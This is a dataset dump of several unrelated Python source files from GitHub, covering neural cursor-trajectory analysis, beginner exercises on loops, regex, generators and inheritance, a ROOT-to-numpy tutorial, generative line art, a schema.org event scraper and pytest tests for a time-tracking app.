\n else:\n #tg = targ_i_all[ix[0], :]\n\n ### Subtract obstacle target center; \n #tg = tg - np.array([0., 2.5])\n\n 
### Convert cm --> m \n #tg = tg / 100.\n\n ### Add back the other center; \n #tg = tg + np.array([.04, .14])\n for axrow in range(2):\n ax[axrow, ti].set_xlim([-1.5, 3.0])\n ax[axrow, ti].set_ylim([1, 4.5])\n\n #### Test obstacles ####\n x = sio.loadmat('resim_ppf/jeev_obs_positions_from_amy.mat')\n targ_list = fk.obstrialList\n targ_series = targ_list[i, :] - 63\n TC0 = x['targObjects'][:, :, int(targ_series[0])-1]\n TC1 = x['targObjects'][:, :, int(targ_series[1])-1]\n TC2 = x['targObjects'][:, :, int(targ_series[2])-1]\n\n for t in [TC0, TC1, TC2]:\n\n ### Subtract center;\n ### Update 10/6/20 --> this isn't necessary; \n #t_dem = t - np.array([0., 2.5])[:, np.newaxis]\n\n ### Convert from cm --> m \n t_m = t / 100.\n\n ### Add other center; \n centerpos = np.array([ 0.0377292, 0.1383867])\n t_ = t_m + centerpos[:, np.newaxis]\n\n if binsize == 0.005:\n for axrow in range(2):\n ax[axrow, ti].plot(t_[0, :], t_[1, :], 'k-')\n\n elif binsize == 0.1:\n for axrow in range(2):\n ax[axrow, ti].plot(t_[0, :]*20, t_[1, :]*20, 'k-')\n \n #### Get cneterpos; \n centerPos = np.mean(TC0, axis=1)/100. + centerpos\n targetPos = np.mean(TC2, axis=1)/100. 
+ centerpos\n \n if binsize == 0.1:\n centerPos = centerPos*20\n targetPos = targetPos*20\n\n ######### Plot each trial; ############\n for trl in trl_ix:\n\n ### This a CW or CCW trial ?\n if task == 'obs':\n \n if i in [1, 3, 4, 5, 8, 9]: \n axros = analysis_config.jeev_cw_ccw_dict[i]\n elif day_ix == 3 and i == 2:\n axrow, s = CW_CCW_obs(centerPos, targetPos, cursor_state[trl][:, [0, 2]].T)\n if s < 0.1: \n axrow = 1\n else:\n axrow, _ = CW_CCW_obs(centerPos, targetPos, cursor_state[trl][:, [0, 2]].T)\n \n ax[axrow, ti].plot(cursor_state[trl][:, 0], cursor_state[trl][:, 2], '-', color = colors[i], linewidth=1.0)\n ax[axrow, ti].plot(cursor_state[trl][0, 0], cursor_state[trl][0, 2], 'r.')\n ax[axrow, ti].set_title(\"Targ %d\" %(i))\n else:\n ax[ti].plot(cursor_state[trl][:, 0], cursor_state[trl][:, 2], '-', color = colors[i], linewidth=1.0)\n ax[ti].plot(cursor_state[trl][0, 0], cursor_state[trl][0, 2], 'r.')\n ax[ti].set_title(\"Targ %d\" %(i))\n f.tight_layout()\n\ndef plot_percent_correct_t2t(plot=True, min_obs_targ = 2): \n input_type = fk.task_filelist\n \n metrics = dict()\n metrics['co_pc'] = []\n metrics['obs_pc'] = []\n\n metrics['co_tt'] = []\n metrics['co_tt_mn'] = []\n\n metrics['obs_tt'] = []\n metrics['obs_tt_mn'] = [] \n\n metrics['perc_fulfill_obs'] = []\n metrics['perc_fulfill_obs_mn'] = []\n \n \n tsk_keys = ['co', 'obs']\n\n f, ax = plt.subplots(figsize = (3, 4))\n f2, ax2 = plt.subplots(figsize = (3, 4))\n f3, ax3 = plt.subplots(figsize = (3, 4))\n\n for i_d, day in enumerate(input_type):\n day_perc_fulfill = []; \n\n for i_tsk, tsk in enumerate(day):\n for i_te, filename in enumerate(tsk):\n\n tsk_key = tsk_keys[i_tsk]\n\n ####### Get percent correct #############\n if 'jeev082413_VFB_PPF_B100_NS5_NU20_Z1_assist_ofc_cont_cont_assist_ofc_fixData' in filename:\n start_index_overall = 55003\n else:\n start_index_overall = 0\n\n ####### Load the correct file #######\n filelist_task = []\n for i, j in enumerate(fk.task_filelist):\n for k, l in 
enumerate(j):\n filelist_task.extend(l)\n try:\n dat = sio.loadmat(filename)\n except:\n ix = [j for i, j in enumerate(filelist_task) if filename in j]\n assert(len(ix)==1)\n \n try:\n dat = sio.loadmat(fk.task_directory+ix[0])\n except:\n dat = sio.loadmat(fk.task_directory_mbp+ix[0])\n \n ###### Get strobed #########\n strobed = make_strobed(dat, start_index_overall)\n cursor_kin = dat['cursor_kin']\n\n go_ix = np.nonzero(strobed[:, 1] == 5)[0]\n print(('1. Total Go Ix: %d' %(len(go_ix))))\n\n ###### Successfully get out of the center #####\n keep_ix = np.nonzero(strobed[go_ix+1, 1] == 6)[0]\n go_ix = go_ix[keep_ix]\n go_ix = go_ix[go_ix < len(strobed) - 3]\n print(('2. Go Ix, out of center: %d' %(len(go_ix))))\n \n ##### Remove targets 0, 1 for obstacle; \n ### Get target index: \n targ_ix = get_targ_ix(strobed, go_ix, tsk_key)\n\n if tsk_key == 'obs':\n keep_ix = np.nonzero(targ_ix >= min_obs_targ)[0]\n else:\n keep_ix = np.arange(len(targ_ix))\n\n go_ix = go_ix[keep_ix]\n print(('3. Go Ix, rm targs obs only: %d' %(len(go_ix))))\n \n ##### Obstacle collision = 300 ########\n obs_coll_ix = np.nonzero(strobed[go_ix+2, 1] == 300)[0]\n\n ##### Target timeout = 12 ##########\n timeout_ix = np.nonzero(strobed[go_ix+2, 1] == 12)[0]\n\n ###### Target hold error = 8 #######\n the_ix = np.nonzero(strobed[go_ix + 3, 1] == 8)[0]\n\n ##### Rew Ix \n rew_ix = np.nonzero(strobed[go_ix + 3, 1] == 9)[0]\n\n #### Are all trials accounted for ####? 
\n ### Make sure no overlap \n assert len(np.unique(np.hstack((rew_ix, the_ix, timeout_ix, obs_coll_ix)))) == len(np.hstack((rew_ix, the_ix, timeout_ix, obs_coll_ix)))\n \n ### Make sure all trials accounted for ###\n if len(np.unique(np.hstack((rew_ix, the_ix, timeout_ix, obs_coll_ix)))) == len(go_ix):\n N_trls = len(go_ix)\n else:\n ### These notes for for go_ix with all obs targets; May be different if ignore obs target 0, 1; \n ### this happened once in day 0 --> 5, 6, 15, 4, go_ix[205]\n ### with 25 sec in between 6 --> 15 \n ### Maybe kinarm task restarted? \n\n ### happened once day 1 --> go_ix[185], seems like skipped 9? \n\n ### Day 2 --> [5, 6, 9] at go_ix[132], seems like skipped 7; \n print(('Day %d, Task %d, Discrepancy %d' %(i_d, i_tsk, len(go_ix) - len(np.hstack((rew_ix, the_ix, timeout_ix, obs_coll_ix))))))\n N_trls = len(np.unique(np.hstack((rew_ix, the_ix, timeout_ix, obs_coll_ix))))\n \n #### Add percent correct \n metrics[tsk_key + '_pc'].append(float(len(rew_ix)) / float(N_trls))\n\n #### Trial time #####\n trl_time = strobed[go_ix[rew_ix] + 3, 0] - strobed[go_ix[rew_ix], 0]\n metrics[tsk_key + '_tt'].append(trl_time*.005)\n metrics[tsk_key + '_tt_mn'].append(np.mean(trl_time*.005))\n\n ##### For each rewarded trial, get the 3 targets: \n if i_tsk == 0: \n\n for i_trl, trl_go in enumerate(go_ix[rew_ix]): \n targ_ = strobed[trl_go - 2, 1]\n go_ = strobed[trl_go, 0]\n rew_ = strobed[trl_go + 3, 0]\n\n ### Get cursor trajectories ###\n trl_cursor = cursor_kin[[0, 1], go_:rew_] - fk.centerPos[:, np.newaxis]\n\n ### Which target are we in ####\n targ_ix = np.nonzero(fk.cotrialList == targ_)[0]\n tp = fk.targetPos[targ_ix, :] - fk.centerPos; \n tp_norm = tp / np.linalg.norm(tp)\n\n ### Rotate the cursor #### \n angle = np.arctan2(tp_norm[0, 1], tp_norm[0, 0])\n Rot = np.array([[np.cos(-1*angle), -np.sin(-1*angle)], [np.sin(-1*angle), np.cos(-1*angle)]])\n \n ### Does the path go through any of the obstacle targets? How many? 
\n trl_cursor_rot = np.dot(Rot, trl_cursor)\n perc_obs_viol = test_perc_obs_viol(trl_cursor_rot, min_obs_targ, plot=plot)\n \n metrics['perc_fulfill_obs'].append(1. - perc_obs_viol)\n day_perc_fulfill.append(1. - perc_obs_viol)\n\n if plot:\n import pdb; pdb.set_trace()\n\n day_perc_fulfill = np.hstack((day_perc_fulfill))\n metrics['perc_fulfill_obs_mn'].append(np.mean(day_perc_fulfill))\n\n ##### plot these guys #####\n ########### PERCENT CORRECT ##############\n util_fcns.draw_plot(0, np.hstack((metrics['co_pc'])), 'g', [1., 1., 1., 0.], ax, width = .5)\n util_fcns.draw_plot(1, np.hstack((metrics['obs_pc'])),'b', [1., 1., 1., 0.], ax, width = .5)\n print(('mean perc correct CO %.2f, OBS %.2f' %(np.mean(np.hstack((metrics['co_pc']))), \n np.mean(np.hstack((metrics['obs_pc']))))))\n\n for _, (c, o) in enumerate(zip(metrics['co_pc'], metrics['obs_pc'])):\n ax.plot([0, 1], [c, o], '-', color='gray', linewidth=0.5)\n ax.set_xlim([-0.8, 1.8])\n ax.set_ylim([0., 1.])\n ax.set_ylabel('Percent Correct')\n ax.set_xticks([0, 1])\n ax.set_xticklabels(['CO', 'OBS'], rotation=45)\n\n ########### Target TIME ##############\n util_fcns.draw_plot(0, np.hstack((metrics['co_tt'])), 'k', [1., 1., 1., 0.], ax2, width = .5)\n util_fcns.draw_plot(1, np.hstack((metrics['obs_tt'])),'k', [1., 1., 1., 0.], ax2, width = .5)\n for _, (c, o) in enumerate(zip(metrics['co_tt_mn'], metrics['obs_tt_mn'])):\n ax2.plot([0, 1], [c, o], '-', color='gray', linewidth=0.5)\n ax2.set_xlim([-0.8, 1.8])\n ax2.set_ylim([0., 7.5])\n ax2.set_ylabel('Time to Target (sec)')\n ax2.set_xticks([0, 1])\n ax2.set_xticklabels(['CO', 'OBS'], rotation=45)\n f2.tight_layout()\n util_fcns.savefig(f2, 't2t_jeev')\n\n ########### Target TIME ##############\n util_fcns.draw_plot(0, np.hstack((metrics['perc_fulfill_obs'])), 'g', [1., 1., 1., 0.], ax3, width = .5)\n for _, o in enumerate(metrics['perc_fulfill_obs_mn']):\n ax3.plot(0, o, '.', color='gray')\n ax3.set_xlim([-0.8, 0.8])\n ax3.set_ylim([0., 1.0])\n 
ax3.set_ylabel('% Fulfill Obs.')\n ax3.set_xticks([0])\n ax3.set_xticklabels(['CO'], rotation=45)\n\ndef test_perc_obs_viol(trl_curs, min_obs_targ, plot=False): \n\n ### Rotate and stretch all the targets to line up to \n x = sio.loadmat('resim_ppf/jeev_obs_positions_from_amy.mat')\n targ_list = fk.obstrialList\n targ_list = targ_list[min_obs_targ:, :]\n rad = 0.065\n\n if plot:\n f, ax = plt.subplots()\n ax.plot(trl_curs[0, :], trl_curs[1, :], 'k-')\n ax.plot(trl_curs[0, 0], trl_curs[1, 0], 'r.')\n\n violate = np.zeros((targ_list.shape[0]))\n\n for i in range(targ_list.shape[0]):\n targ_series = targ_list[i, :] - 63\n TC0 = np.mean(x['targObjects'][:, :, int(targ_series[0])-1], axis=1)\n TC2 = np.mean(x['targObjects'][:, :, int(targ_series[2])-1], axis=1) - TC0\n \n ### Center by TC0\n ### Rotate by TC2; \n ### What is the angle with respect to center point; \n TC2_norm = TC2 / np.linalg.norm(TC2)\n angle = np.arctan2(TC2_norm[1], TC2_norm[0])\n R = np.array([[np.cos(-1*angle), -np.sin(-1*angle)], [np.sin(-1*angle), np.cos(-1*angle)]])\n \n ### Scaling on x-axis ###\n TC2_rot = np.dot(R, TC2[:, np.newaxis])\n scale_all = rad/TC2_rot[0]\n \n ### Now get the obstacle target; \n targ = targ_series[1]\n TC1 = x['targObjects'][:, :, int(targ)-1] # 2 x 100 \n T_dem = TC1-TC0[:, np.newaxis]\n T_rot = np.dot(R, T_dem)\n T_rot_scale = T_rot*scale_all; \n\n if plot: \n #### Plot obstacle ###\n ax.plot(T_rot_scale[0, :], T_rot_scale[1, :], 'b-')\n\n ### Does the cursor pass through this?\n xrad = 0.5*(np.max(T_rot_scale[0, :]) - np.min(T_rot_scale[0, :]))\n yrad = 0.5*(np.max(T_rot_scale[1, :]) - np.min(T_rot_scale[1, :]))\n\n ### Get the center point; \n xmn = np.mean(T_rot_scale[0, :])\n ymn = np.mean(T_rot_scale[1, :])\n\n val = ((trl_curs[0, :] - xmn)**2 / (xrad**2)) + ((trl_curs[1, :] - ymn)**2 / (yrad**2))\n if np.any(val <= 1): \n ix = np.nonzero(val <= 1)[0]\n violate[i] = 1; \n\n if plot: \n ax.plot(trl_curs[0, ix], trl_curs[1, ix], 'm.')\n\n return np.sum(violate) 
/ float(len(violate))\n\ndef CW_CCW_obs(centerPos, targPos, trialPos, plot=False):\n \"\"\"\n Return 0: if CW to get to target, return 1 if CCW to get to target; \n Steps: \n 1. Center by the centerPos\n 2. Rotate by targPos angle such that aligned with (0, 1) axis; \n 3. Compute integral unneath curve; \n\n Args:\n centerPos (np.array): (x, y) of centerPos (or start target for Jeev)\n targPos (np.array): (x, y) of targetPos (or end target for Jeev)\n trialPos (np.array): (2 x T) of trial trajectory (position)\n \n Returns:\n integer: 0 for CW, 1 for CCW\n \"\"\"\n\n targCentered = targPos - centerPos\n targCentered_norm = targCentered / np.linalg.norm(targCentered)\n\n assert(trialPos.shape[0] == len(centerPos) == 2)\n trialCentered = trialPos - centerPos[:, np.newaxis]\n\n ### Rotate Target / trial; \n angle = np.arctan2(targCentered_norm[1], targCentered_norm[0])\n\n ### Rotate by negative of angle: \n Rot = np.array([[np.cos(-1*angle), -np.sin(-1*angle)], [np.sin(-1*angle), np.cos(-1*angle)]])\n\n ### Apply this rotation to the trial: \n trialCentRot = np.dot(Rot, trialCentered)\n\n ### Get step size; \n dx = np.hstack(([0], np.diff(trialCentRot[0, :])))\n\n ### Get the height: \n y = trialCentRot[1, :]\n\n assert(len(dx) == len(y))\n\n if np.dot(dx, y) > 0:\n rot = 'CW'\n return 0, np.dot(dx, y)\n\n elif np.dot(dx, y) < 0:\n rot = 'CCW'\n return 1, np.dot(dx, y)\n\n elif np.dot(dx, y) == 0:\n raise Exception('Perfect Straight Line?')\n\n if plot:\n plot_CW_CCW(trialPos, trialCentRot, rot)\n \ndef plot_CW_CCW(trialPos, trialCentRot, rot):\n f, ax = plt.subplots(ncols = 2)\n ax[0].plot(trialPos[0, :], trialPos[1, :])\n ax[1].plot(trialCentRot[0, :], trialCentRot[1, :])\n ax[1].set_title('Rot %s'%(rot))\n\n\n\n\n","repo_name":"pkhanna104/bmi_dynamics_code","sub_path":"resim_ppf/ppf_pa.py","file_name":"ppf_pa.py","file_ext":"py","file_size_in_byte":30446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} 
+{"seq_id":"22527537762","text":"from .frog_world import FrogWorld\nfrom .wizard_world import WizardWorld\nfrom .game_environment import GameEnvironment\n\n\ndef validate_age(name):\n try:\n age = input(f'Welcome {name}. How old are you?')\n age = int(age)\n except ValueError as err:\n print(f'Age {age} is invalid, please try again...')\n return (False, age)\n return (True, age)\n\n\ndef main():\n name = input('Hello. What\\'s your name?')\n valid_input = False\n while not valid_input:\n valid_input, age = validate_age(name)\n game = FrogWorld if age < 18 else WizardWorld\n environment = GameEnvironment(game(name))\n environment.play()\n","repo_name":"teddyondieki/mastering_python","sub_path":"abstract_method/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7717974102","text":"'''\r\nWrite a Python program where a string will start with a specific number. \r\n'''\r\nimport re\r\n\r\nstr = input(\"Enter a str : \")\r\n\r\n# string should start with a number\r\nx = re.search('^[0-9]+', str)\r\n\r\nif x:\r\n print(\"Matching....\")\r\nelse:\r\n print(\"Not Matching\")","repo_name":"alexandercooper97/300-Python-Exercises","sub_path":"03_Complex/Problem_245/p245.py","file_name":"p245.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"30758550398","text":"def simpleGeneratorFun():\n yield 1\n yield 2\n yield 3\n\n\n# Driver code to check above generator function\nfor value in simpleGeneratorFun():\n print(value)\n\n\n# A generator function\ndef simpleGeneratorFun():\n yield 4\n yield 5\n yield 6\n\n\n# x is a generator object\nx = simpleGeneratorFun()\n\n# Iterating over the generator object using next\nwhile(x):\n try:\n print(x.__next__())\n except:\n #print(\"Exception \")\n 
break;","repo_name":"sethpal/PythonConceptsLearning","sub_path":"oops/generators/Generators.py","file_name":"Generators.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13187873906","text":"## \\file\n## \\ingroup tutorial_pyroot\n## \\notebook -nodraw\n## This tutorial shows how a TTree can be quickly converted to a numpy array or\n## a pandas.DataFrame.\n##\n## \\macro_code\n## \\macro_output\n##\n## \\date April 2018\n## \\author Stefan Wunsch\n\nimport ROOT\nfrom sys import exit\n\ntry:\n import numpy as np\nexcept:\n print(\"Failed to import numpy.\")\n exit()\n\n\n# Helper function to create an example tree\ndef make_example():\n root_file = ROOT.TFile(\"pyroot002_example.root\", \"RECREATE\")\n tree = ROOT.TTree(\"tree\", \"tutorial\")\n x = np.empty((1), dtype=\"float32\")\n y = np.empty((1), dtype=\"float32\")\n tree.Branch(\"x\", x, \"x/F\")\n tree.Branch(\"y\", y, \"y/F\")\n\n for i in range(4):\n x[0] = i\n y[0] = -i\n tree.Fill()\n root_file.Write()\n\n return (root_file, x, y), tree\n\n\n# The conversion of the TTree to a numpy array is implemented with multi-\n# thread support.\nROOT.ROOT.EnableImplicitMT()\n\n# Create a ROOT file with a tree and the branches \"x\" and \"y\"\n_, tree = make_example()\n\n# Print content of the tree by looping explicitly\nprint(\"Tree content:\\n{}\\n\".format(\n np.asarray([[tree.x, tree.y] for event in tree])))\n\n# Read-out full tree as numpy array\narray = tree.AsMatrix()\nprint(\"Tree converted to a numpy array:\\n{}\\n\".format(array))\n\n# Get numpy array and according labels of the columns\narray, labels = tree.AsMatrix(return_labels=True)\nprint(\"Return numpy array and labels:\\n{}\\n{}\\n\".format(labels, array))\n\n# Apply numpy methods on the data\nprint(\"Mean of the columns retrieved with a numpy method: {}\\n\".format(\n np.mean(array, axis=0)))\n\n# Read only specific branches\narray = 
tree.AsMatrix(columns=[\"x\"])\nprint(\"Only the content of the branch 'x':\\n{}\\n\".format(np.squeeze(array)))\n\narray = tree.AsMatrix(exclude=[\"x\"])\nprint(\"Read all branches except 'x':\\n{}\\n\".format(np.squeeze(array)))\n\n# Get an array with a specific data-type\narray = tree.AsMatrix(dtype=\"int\")\nprint(\"Return numpy array with data-type 'int':\\n{}\\n\".format(array))\n\n## Convert the tree to a pandas.DataFrame\ntry:\n import pandas\nexcept:\n print(\"Failed to import pandas.\")\n exit()\n\ndata, columns = tree.AsMatrix(return_labels=True)\ndf = pandas.DataFrame(data=data, columns=columns)\nprint(\"Tree converted to a pandas.DataFrame:\\n{}\".format(df))\n","repo_name":"maartenb/cern-root","sub_path":"tutorials/pyroot/pyroot002_TTreeAsMatrix.py","file_name":"pyroot002_TTreeAsMatrix.py","file_ext":"py","file_size_in_byte":2289,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"34844238161","text":"\n'''\n\"Enquanto\"\n-> estrutura de repetição com teste lógico \n-> sabendo o limite, usa for ou while\n-> não sabendo o limite, usa while \n'''\n\nfor a in range(1, 10):\n print(a)\nprint('FIM')\n\nprint('-----'*10)\n\nb = 1\nwhile b < 10:\n print(b)\n b += 1\nprint('FIM')\n\nprint('-----'*10)\n\nfor c in range(1, 5): #tem limite\n d = int(input('Digite um valor: '))\nprint('FIM')\n\nprint('-----'*10)\n\nwhile e != 0: #não tem limite, o programa para quando digitar 0 | flag / ponto de parada / condição de parada\n e = int(input('Digite um número: '))\nprint('FIM')\n\nprint('-----'*10)\n\nf = 'S'\nwhile f == 'S': #O programa para quando digitar \"N\"\n g = int(input('Digite um valor: '))\n f = str(input('Quer cntinuar? 
[S/N] ')).upper()\nprint('FIM')\n\nprint('-----'*10)\n\nh = 1\npar = impar = 0\nwhile h != 0:\n h = int(input('Digite um número: '))\n if h != 0:\n if h % 2 == 0:\n par += 1 \n else:\n impar += 1 \nprint(f'Você digitou {par} números pares e {impar} números ímpares!')\n\n","repo_name":"Piresle/Python","sub_path":"Aulas/10_Estrutura_de_Repetição_While.py","file_name":"10_Estrutura_de_Repetição_While.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"19493895813","text":"#继承\nclass Animal(object):\n\tdef run(self):\n\t\tprint(\"Animal is running....\")\n\n\nclass Cat(Animal):\n\tdef run(self):\n\t\tprint(\"Cat is running....\")\n\n\nclass Dog(Animal):\n\tdef run(self):\n\t\tprint(\"Dog is running....\")\n\n\nclass Timer(object):\n\tdef run(self):\n\t\tprint(\"Timer is running....\")\n\n\nclass Tortoise(Animal):\n\t\tdef run(self):\n\t\t\tprint(\"Tortoise is running slowly....\")\n\n\ndef run_twice(animal):\n\tanimal.run()\n\tanimal.run()\n\n\nif __name__ == '__main__':\n\ta = Animal()\n\ta.run()\n\tprint(\"isinstance(a,object)\",isinstance(a, object))\n\tb = Cat()\n\tprint(\"isinstance(b,Animal)\",isinstance(b, Animal))\n\tb.run()\n\tc = Dog()\n\tc.run()\n\td=Timer()\n\n\trun_twice(a)\n\trun_twice(b)\n\trun_twice(c)\n\n\t#动态语言的“鸭子类型”,它并不要求严格的继承体系,一个对象只要“看起来像鸭子,走起路来像鸭子”,那它就可以被看做是鸭子。\n\t#这里只要d对象有run方法就可以传入参数\n\trun_twice(d)\n\n\trun_twice(Tortoise())\n\n\t\t\n\t\n\t\n\t\n\t\n\t\n\t\n\n","repo_name":"7colorlotus/pythonLearn","sub_path":"oop/Extend.py","file_name":"Extend.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"41909254247","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\nfrom numpy import pi, cos, sin, linspace, zeros\nfrom numpy.random import random\nfrom modules.growth import spawn, spawn_curl\n\nNMAX = 10**7\nSIZE = 10000\nONE = 1./SIZE\n\nSTP = 
ONE*0.02\nNEARL = 15*ONE\nFARL = 0.235\n\nPROCS = 6\n\nMID = 0.5\n\nLINEWIDTH = 5.*ONE\n\nINIT_NUM = 7\n\nBACK = [1,1,1,1]\nFRONT = [0,0,0,0.08]\n\nTWOPI = pi*2.\n\n\ndef main():\n\n from time import time\n from itertools import count\n\n from differentialLine import DifferentialLine\n\n from iutils.render import Render\n from modules.helpers import print_stats\n\n from modules.show import sandstroke\n from modules.show import show\n from modules.show import dots\n\n\n np_coords = zeros(shape=(NMAX,4), dtype='float')\n np_vert_coords = zeros(shape=(NMAX,2), dtype='float')\n\n\n DF = DifferentialLine(NMAX, FARL*2, NEARL, FARL, PROCS)\n\n render = Render(SIZE, BACK, FRONT)\n\n render.ctx.set_source_rgba(*FRONT)\n render.ctx.set_line_width(LINEWIDTH)\n\n # angles = sorted(random(INIT_NUM)*TWOPI)\n # DF.init_circle_segment(MID,MID,0.2, angles)\n\n ## arc\n\n angles = sorted(random(INIT_NUM)*pi*1.5)\n xys = []\n for a in angles:\n x = 0.5 + cos(a)*0.2\n y = 0.5 + sin(a)*0.2\n xys.append((x,y))\n\n DF.init_line_segment(xys, lock_edges=1)\n\n ## vertical line\n\n #yy = sorted(MID + 0.2*(1-2*random(INIT_NUM)))\n #xx = MID+0.005*(0.5-random(INIT_NUM))\n #xys = []\n #for x,y in zip(xx,yy):\n #xys.append((x,y))\n\n #DF.init_line_segment(xys, lock_edges=1)\n\n ## diagonal line\n\n # yy = sorted(MID + 0.2*(1-2*random(INIT_NUM)))\n # xx = sorted(MID + 0.2*(1-2*random(INIT_NUM)))\n # xys = []\n # for x,y in zip(xx,yy):\n # xys.append((x,y))\n\n # DF.init_line_segment(xys, lock_edges=1)\n\n\n for i in count():\n\n t_start = time()\n\n DF.optimize_position(STP)\n spawn_curl(DF,NEARL,0.016)\n\n if i%100==0:\n fn = './res/chris_bd_{:04d}.png'.format(i)\n else:\n fn = None\n\n render.set_front(FRONT)\n num = DF.np_get_edges_coordinates(np_coords)\n sandstroke(render,np_coords[:num,:],20,fn)\n\n\n if random()<0.05:\n sandstroke(render,np_coords[:num,:],30,None)\n\n vert_num = DF.np_get_vert_coordinates(np_vert_coords)\n dots(render,np_vert_coords[:vert_num,:],None)\n\n\n t_stop = 
time()\n\n print_stats(i,t_stop-t_start,DF)\n\n\nif __name__ == '__main__':\n\n main()\n\n","repo_name":"inconvergent/differential-line","sub_path":"main_line.py","file_name":"main_line.py","file_ext":"py","file_size_in_byte":2295,"program_lang":"python","lang":"en","doc_type":"code","stars":675,"dataset":"github-code","pt":"44"} +{"seq_id":"26045237396","text":"import requests\nimport extruct\nheaders= {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'}\n\n#method to check status of url\ndef is_url_ok(url):\n try:\n return 200 == requests.head(url).status_code\n except Exception:\n return False\n\ndef clean_data(data):\n out=[]\n if data['json-ld']!=[]:\n for rec in data['json-ld']:\n try:\n if rec['@type'] == 'Event':\n d = rec.copy()\n out.append(d)\n except KeyError:\n pass\n\n if data['microdata'] != []:\n for rec in data['microdata']:\n try:\n if rec['type'] in ('http://schema.org/Event',\n 'https://schema.org/Event'):\n d = rec['properties'].copy()\n # @context and @type to match json-ld style\n if rec['type'][:6] == 'https:':\n d['@context'] = 'https://schema.org'\n else:\n d['@context'] = 'http://schema.org'\n d['@type'] = 'Event'\n\n for key in d.keys():\n if isinstance(d[key], dict) and 'type' in d[key]:\n type_ = d[key].pop('type')\n d[key]['@type'] = type_.split('/')[3] # taking last part of url which holds type\n\n out.append(d)\n except KeyError as ke:\n print(\"Exception :\",ke)\n\n return out\n\ndef parse_from_url(url):\n if not isinstance(url,str):\n raise TypeError\n good_data={}\n if(is_url_ok(url)):\n response = requests.get(url, headers=headers)\n data = extruct.extract(response.text, response.url)\n good_data=clean_data(data)\n else:\n print('URL may be Dead/Not Working !')\n\n return 
good_data","repo_name":"rohitbabugaddeti/events-scraper","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"7046641648","text":"import pytest\n\nimport tests.testsHelper as Hlp\n\n#################################################################################################\n# TimeStamp tests\n#################################################################################################\n\n\n@pytest.mark.parametrize('timeDigitsTup, expectedResult',\n [\n (([20, 3, 8], [20, 3, 8]), 0),\n (([20, 3, 8], [20, 3, 18]), 10),\n (([20, 3, 8], [21, 3, 8]), 3600)\n\n ])\ndef test_TS_calculateTimeDiff(timeDigitsTup, expectedResult):\n # arrange\n ts = Hlp.createTimestamp(timeDigitsTup)\n\n # act\n result = ts.calculateTimeDiffInSecs()\n\n # assert\n assert result == expectedResult\n\n\ndef test_TS_equality():\n # arrange\n ts1 = Hlp.createTimestamp(([20, 3, 8], [20, 3, 8]))\n ts2 = Hlp.createTimestamp(([20, 3, 8], [20, 3, 8]))\n ts3 = Hlp.createTimestamp(([21, 10, 8], [22, 0, 0]))\n\n # act\n # well, not this time my friend ;)\n\n # assert\n assert ts1 == ts2\n assert ts1 != ts3\n\n\n#################################################################################################\n# DetailedInstance tests\n#################################################################################################\n\n\n@pytest.mark.parametrize('timeDigitsTupList, expectedResult',\n [\n ([([20, 3, 8], [20, 3, 8])], 0),\n ([([20, 3, 8], [20, 3, 18])], 10),\n ([([20, 3, 8], [21, 3, 8])], 3600),\n ([([20, 3, 8], [21, 3, 8]), ([22, 0, 0], [23, 0, 0])], 7200)\n ])\ndef test_DI_totalTimeInNew(timeDigitsTupList, expectedResult):\n # arrange\n di = Hlp.createDetailedInstance(timeDigitsTupList, 'youtube')\n\n # act\n totalTime = di.totalTime\n\n # assert\n assert totalTime == expectedResult\n\n\n# TODO: maybe more friendly parameters, so we 
don't have to keep in mind that 10sec for the initial timestamp?\n@pytest.mark.parametrize('newTimestampDigits, expectedTimestampsCount, expectedTotalTime',\n [\n (([20, 0, 0], [20, 0, 10]), 1, 10),\n (([20, 4, 0], [20, 4, 30]), 2, 40)\n ])\ndef test_DI_addingNewTimetamp(newTimestampDigits, expectedTimestampsCount, expectedTotalTime):\n # arrange\n di = Hlp.createDetailedInstance([([20, 0, 0], [20, 0, 10])], 'youtube')\n\n # act\n di.addTimeStamp(Hlp.createTimestamp(newTimestampDigits))\n\n # assert\n assert len(di.timestamps) == expectedTimestampsCount\n assert di.totalTime == expectedTotalTime\n\n\n#################################################################################################\n# ApplicationWithInstances tests\n#################################################################################################\n\n\ndef test_AWI_updateExistingInstance():\n # arrange\n app = Hlp.createBasicApp([([20, 0, 0], [20, 0, 10])], 'youtube.com', 'opera')\n di = Hlp.createDetailedInstance([([20, 30, 0], [20, 30, 30])], 'youtube.com')\n\n # act\n app.updateOrAddInstance(di)\n\n # assert\n assert len(app.instances) == 1\n assert len(app.instances[0].timestamps) == 2\n assert app.instances[0].totalTime == 40\n\n\ndef test_AWI_addNewInstance():\n # arrange\n app = Hlp.createBasicApp([([20, 0, 0], [20, 0, 10])], 'youtube.com', 'opera')\n di = Hlp.createDetailedInstance([([19, 30, 0], [19, 31, 0])], 'howtostaycool.com')\n\n # act\n app.updateOrAddInstance(di)\n\n # assert\n assert len(app.instances) == 2\n assert len(app.instances[0].timestamps) == 1\n assert len(app.instances[1].timestamps) == 1\n\n assert app.instances[0].totalTime == 10\n assert app.instances[1].totalTime == 60\n\n\ndef test_AWI_updateBasedOnOtherAppSameInstances():\n # arrange\n app1 = Hlp.createBasicApp([([20, 0, 0], [20, 0, 10])], 'youtube.com', 'opera')\n app2 = Hlp.createBasicApp([([20, 10, 0], [20, 10, 30])], 